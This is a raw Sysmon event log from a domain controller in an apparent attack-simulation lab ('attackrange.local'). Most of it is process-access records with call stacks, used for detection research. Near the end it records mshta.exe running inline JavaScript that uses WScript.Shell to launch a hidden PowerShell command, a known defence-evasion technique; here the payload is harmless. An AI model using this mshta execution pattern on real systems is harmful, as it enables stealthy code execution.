15:59:41.038{7901BC46-4A8C-6008-0601-00000000A301}25005936C:\Windows\Explorer.EXE{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.022{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.022{7901BC46-4A8A-6008-0001-00000000A301}48362036C:\Windows\system32\taskhostw.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.022{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.022{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.022{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.006{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:41.006{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.991{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.991{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.991{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.991{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.991{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.991{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-536C-6008-7106-00000000A301}4112C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.553{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.553{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.506{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.506{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000027344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.475{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xfeeun2x.0oz.ps12021-01-20 15:59:42.475 10341000x800000000000000027343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.459{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.412{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7606-00000000A301}5468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.412{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-536E-6008-7606-00000000A301}5468C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.412{7901BC46-536E-6008-7606-00000000A301}54687208C:\Windows\system32\conhost.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.412{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-536E-6008-7606-00000000A301}5468C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.397{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.397{7901BC46-4A88-6008-F200-00000000A301}19126716C:\Windows\system32\csrss.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.397{7901BC46-536E-6008-7406-00000000A301}47686096C:\Windows\System32\mshta.exe{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\shell32.dll+8d42f|C:\Windows\System32\shell32.dll+8d2bc|C:\Windows\System32\shell32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000027332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:42.408{7901BC46-536E-6008-7506-00000000A301}7980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa; Start-Sleep -Seconds 2; exitC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{7901BC46-536E-6008-7406-00000000A301}4768C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "javascript:a=new ActiveXObject("WScript.Shell");a.Run("powershell.exe%20-nop%20-Command%20Write-Host%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%20Start-Sleep%20-Seconds%202;%20exit",0,true);close();" 10341000x800000000000000027331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 